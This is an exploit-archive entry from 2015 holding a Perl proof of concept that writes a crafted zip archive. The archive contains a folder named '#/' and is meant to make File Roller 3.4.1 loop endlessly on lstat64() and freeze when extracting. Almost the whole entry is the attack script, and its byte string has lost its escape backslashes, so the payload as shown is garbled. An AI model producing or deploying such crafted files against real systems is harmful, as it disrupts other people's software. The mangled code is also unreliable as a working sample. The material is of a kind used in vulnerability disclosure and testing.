File Roller 3.4.1 Denial Of Service

Posted on 10 July 2015

#!/usr/bin/perl # # Title: File Roller - DoS PoC # Date: 08/07/2015 # Author: Arsyntex # Homepage: https://wiki.gnome.org/Apps/FileRoller # Version: v3.4.1 # Tested on: Linux lab 3.2.0-85-generic-pae #122-Ubuntu i686 i386 GNU/Linux # ------------------------------------------------------------------------- # Create a zip file with a folder inside named: # # # Run: file-roller --extract-here test.zip # # Result: endless call's of lstat64() (50 % CPU usage) (Freeze app) # $zip = "x50x4bx03x04x14x03x00x00x00x00xd6x55x9cx46x00x00" . "x00x00x00x00x00x00x00x00x00x00x02x00x00x00x23x2f" . "x50x4bx01x02x3fx03x14x03x00x00x00x00xd6x55x9cx46" . "x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00" . "x00x00x00x00x00x00x10x80xfdx41x00x00x00x00x23x2f" . "x50x4bx05x06x00x00x00x00x01x00x01x00x30x00x00x00" . "x20x00x00x00x00x00"; open FILE, ">poc.zip" or die("Can't open poc.zip ") ; binmode(FILE) ; print FILE $zip ; close FILE ;

TOP

Malware :

Last 20

Exploits :

Last 20